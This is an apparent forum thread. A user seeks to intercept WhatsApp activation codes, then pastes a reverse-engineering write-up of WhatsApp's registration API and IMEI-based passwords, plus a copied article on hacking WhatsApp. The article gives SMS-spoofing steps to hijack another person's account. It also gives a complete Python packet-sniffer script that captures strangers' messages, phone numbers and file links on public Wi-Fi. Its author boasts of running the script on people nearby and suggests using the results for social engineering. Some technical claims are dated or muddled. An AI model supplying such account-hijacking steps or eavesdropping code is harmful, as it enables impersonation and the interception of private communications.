Whatsapp Hack

I have heard that WhatsApp is not encrypted (it's an app like Viber) and that when you sign up for a number the code is generated within your phone, sent to WhatsApp servers and then sent to you. Because it is not encrypted you can intercept it from your phone. I have been trying to figure it out for days and saw many links; does anyone have any advice? Here are two posts I found on the internet that might help. They used to have this thing where all you had to do was put your phone in airplane mode and the activation code would be in your outbox, not sent, but that won't work anymore.

A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.

I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it.
I'm not a programmer but had done some "Hello World" stuff in Java before, so I tried to understand a little bit what is going on in the client. (In the following work I always pretended to be a Nokia C3-00, just so that you know when it appears, e.g. in the User-Agent.)


I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't guarantee they are right:


The first thing is the login-Name and the password needed to login:

Matching with reports from some other threads here and in other forums the login name I found was some sort of:
Code:

international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net


For example, if you live in Germany and have the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for Germany without the 0's and the phone number without the 0.


The password is set during the registration process but usually it is a transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transformation works but I have the code that does it.

I just wrapped it _very dirty_ in a standalone Java program to test it. source: http://pastebin.com/npbwcj1s
I really don't know what it exactly does and didn't look deeper into it but it isn't a "real" md5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it what is different except the reverse of the imei?)


The second thing I searched for is the registration process.

With this I got so far that I got a Registration-Code and I also get the response from the server that the account exists, but I can't log in because I hadn't enough time to look exactly at the login process. Just logging in via XAMPP in Pidgin doesn't work expectedly

The registration process works this way: (no guarantee that it is right and don't try it with your "real" number. I tried it with an old SIM I had lying around)


0) All these API requests are done with a User-Agent like:

Code:

WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00


The Code generating this is:
http://pastebin.com/K79wrfnS
I used information I found in the web to fill the information for the Nokia C3-00.
As said by the pw: I don't think you really have to fake it to look like this but it maybe makes it harder to find you.

1) The first step is requesting the Registration-code from the server (the code you get e.g. via SMS)


The API-call looks like this:

Code:

https://r.whatsapp.n...0000&method=sms


The arguments are as follows:

cc = area code without 0's
in = number without first 0
to = number where the sms or call should go to (maybe security weakness?)
lc/lg = Language-Code(?) split up - e.g. DE_de goes to lc=DE&lg=de, US_en would be lc=US&lg=en
mcc/mnc/imsi = Should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number"
-> I don't know how to get to them and the App has as "fallback" just the 0's in it when the system-request for them fails so it should work with the 0's (and it does)

The method is maybe the most interesting thing.

There are 3 methods: self, sms and voice
When choosing sms you get the code via SMS as you may know it; choosing voice you get a call at the to-number where it reads the code (I didn't test it but it would match with information you find at some other places on the web). I don't know what self exactly does and I didn't really look for it because the SMS way seemed the best for me, especially because I just wanted to know my code :>

The Answer after calling the API is an xml saying:

Code:

<code><response status="sucess-sent" result="30"></code>


What error messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with a specific error, it just closes the app when an error occurs if I'm right) ^^


Also you should get an SMS (in case you used the method sms) at the "to" number containing the WhatsApp code, which looks like this:

Code:

WhatsApp code abc


abc is the necessary Code


2) With the given code you can then register your Whatsapp-Account


API-Call:

Code:

https://r.whatsapp.n...d=asdf&code=abc


cc/in = the same as in code.php

udid = the calculated password as explained in the login-data
code = the just received WhatsApp-Code

The XML response looks like:

Code:

<register> <response status="ok" login="4917612345" result="new" /> </register>


The login-value is your login-Name for the connection and built like explained.

I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^

3) As a third API call you can check if an account exists. This isn't necessary for registration, I think.


API-call:

Code:

https://r.whatsapp.n...12345&udid=asdf


Parameters are the same as above.


Response when an account with this number and pw exists:

Code:

<exist><response status="ok" result="4917612345" /></exist>


The result again gives the login-name for this account.

I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exists. You can't check if another number has a WhatsApp account with this API call. (or I just was too stupid to find out how to do this)


The last thing I searched for before studying for my exams was the server connection.


It basically is - as said everywhere - an XAMPP connection. At least it looks like it.

I think there are some small differences between the default XAMPP and the way WhatsApp does it.

But nevertheless the URL I found to where it tries to connect is:

Code:

socket://bin-short.whatsapp.net:5222


When connecting to the URL with Pidgin and default XAMPP it also gets a connection, but the connection gets closed by the server after sending the xml and xampp information.

When I connected to a "default" XAMPP server, after these two "sendings" the client gets a response from the server.
WhatsApp instead sends the Auth directly after the features, so I think the server quits the connection because Pidgin is waiting for information and the server also is waiting for information.

The Login-Process in the WhatsApp-Code looks like:

Code:

out.streamStart(connection.domain, connection.resource);

System.err.println("sent stream start");
sendFeatures();
System.err.println("sent features");
sendAuth();
System.err.println("sent auth");
in.streamStart();
System.err.println("read stream start");
String challengeData = readFeaturesAndChallenge();
System.err.println("read features and challenge");
sendResponse(challengeData);
System.err.println("sent response");
readSuccess();

Because WhatsApp uses a "default" XAMPP library which is just modified and the default functions are still there, I think the default login process of XAMPP looks like:

Code:

send1();

send2DigestMD5Mechanism();
read1();
String challenge = read2Challenge();
send2SASLResponse(challenge);
send2UselessResponse();
read2Challenge();
read2();
send3();
read3();
send4();
send5();

-> as said, after the send1 and 2 (which are doing basically the same as the streamStart and sentFeatures in the WhatsApp version) it waits for information instead of sending the Auth.


Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions.

Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU


That's all I did up to now (or more exactly before my exams).

I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams but even though I finished my exams two weeks ago I didn't find the time to work on this and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all


If some beta-testers are searched for the program I would really like to test it from a hobby-programmer or more non-programmer point of view




PS: Even though I personally don't like it when people ask for forgiveness for their bad English I would like to do the same right now

I'm from Germany and not really good at languages. I really hope my text is readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say)

and then I found this :


How to hack WhatsApp Messenger on Nokia, iPhone & Android




WhatsApp is a cross-platform messaging application used by smartphones. It allows users to exchange instant messages and share media via 3G or WiFi with other users on the platform. Back in May 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text, which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.


In this article I will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.


The first hack I'm going to talk about will spoof WhatsApp and have it think you are somebody else, allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp verification servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.

Hack 1

Install WhatsApp on your device


WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.


WhatsApp now offers an alternative method of verification


Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.


Next we need to do some SMS-Spoofing


There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.

If you are using an iPhone use the following details in the SMS spoofer application.

To: +447900347295

From: +(Country code)(mobile number)
Message: (your email address)

If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.


You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Hack 2

The second attack I’m going to talk about is a little bit more professional. For users who can pull off MITM (Man in the Middle) attacks this is a sure way to rake in data from a public network. I came across the script at the 0x80 blog, so I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python, so it's nice and simple to work with and edit to make it work for similar chat applications.


You will also need to parse the traffic so check this link:
http://www.secdev.org/projects/scapy/

Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM attack and peeking at the packets, we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and whatever else you're hunting for.

Example

DYN:~/whatsapp# python sniffer.py wlan0


#########################

## whatsapp sniff v0.1 ##
#########################

[+] Interface : wlan0

[+] filter : tcp port 5222

To : ***********

Msg : Hello, I will send you a file.

To : **********

Filename : .jpg
URL : https://mms*.whatsap...3/*md5hash*.jpg

From : ***********

Msg : Thanks file has been recieved, take this file too.

From : ***********

Filename : .jpg
URL : https://mms*.whatsap...1/*md5hash*.jpg
Code

You can grab the code on the downloads page
http://insanitypop.com/downloads/ or view it below:

#!/usr/bin/env python
# Python 2 script (print statements, str.decode("string_escape")).

import os
import sys
import scapy.all
import re

# State shared across packets, used to suppress repeated output
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []

def banner():
    print "#########################"
    print "## whatsapp sniff v0.1 ##"
    print "## qnix@0x80.org ##"
    print "#########################\n"

def whatsapp_parse(packet):
    global Previous_Msg
    global Previous_Filename
    global Files
    global Messages
    global Urls
    src = packet.sprintf("%IP.src%")
    dst = packet.sprintf("%IP.dst%")
    sport = packet.sprintf("%IP.sport%")
    dport = packet.sprintf("%IP.dport%")
    raw = packet.sprintf("%Raw.load%")

    # Target Sending stuff
    if dport == "5222":
        Filename = ""
        toNumber = ""
        Url = ""
        Msg = ""
        try:
            # Keep only the digits of the payload, then slice out the number
            toNumber = re.sub("\D", "", raw)
            if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
            else: toNumber = toNumber[5:16]
            try:
                Filename = raw.split("file\\xfc")[1][1:37]
                Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
            except: pass
            try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
            except: pass
        except: pass
        if(len(toNumber) >= 10):
            if(len(Msg) >= 1 and Previous_Msg != Msg):
                Previous_Msg = Msg
                print "To : ", toNumber
                print "Msg : ", Msg
                Messages.append(Msg)
            elif(len(Filename) >= 1 and Previous_Filename != Filename):
                Previous_Filename = Filename
                print "To : ", toNumber
                print "Filename : ", Filename
                print "URL : ", Url
                Files.append(Filename)
                Urls.append(Url)

    # Received Messages
    if sport == "5222":
        Msg = ""
        fromNumber = ""
        Url = ""
        Filename = ""
        try:
            fromNumber = re.sub("\D", "", raw)
            if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
            else: fromNumber = fromNumber[5:16]
            try:
                Filename = raw.split("file\\xfc")[1][1:37]
                Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
            except: pass
            try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
            except: pass
        except: pass
        # Same checks as the sending branch above
        if(len(fromNumber) >= 10):
            if(len(Msg) >= 1 and Previous_Msg != Msg):
                Previous_Msg = Msg
                print "From : ", fromNumber
                print "Msg : ", Msg
                Messages.append(Msg)
            elif(len(Filename) >= 1 and Previous_Filename != Filename):
                Previous_Filename = Filename
                print "From : ", fromNumber
                print "Filename : ", Filename
                print "URL : ", Url
                Files.append(Filename)
                Urls.append(Url)

def callback(packet):
    sport = packet.sprintf("%IP.sport%")
    dport = packet.sprintf("%IP.dport%")
    raw = packet.sprintf("%Raw.load%")
    # sprintf returns '??' when the packet has no Raw layer
    if raw != '??':
        if dport == "5222" or sport == "5222":
            whatsapp_parse(packet)

def main():
    banner()
    if(len(sys.argv) != 2):
        print "%s <interface>" % sys.argv[0]
        sys.exit(1)
    # Settings live on scapy's conf object, not on the scapy module itself
    scapy.all.conf.iface = sys.argv[1]
    scapy.all.conf.verb = 0
    scapy.all.conf.promisc = 0
    expr = "tcp port 5222"

    print "[+] Interface : ", scapy.all.conf.iface
    print "[+] filter : ", expr
    scapy.all.sniff(filter=expr, prn=callback, store=0)

    print "[+] iface %s" % scapy.all.conf.iface

if __name__ == "__main__":
    main()
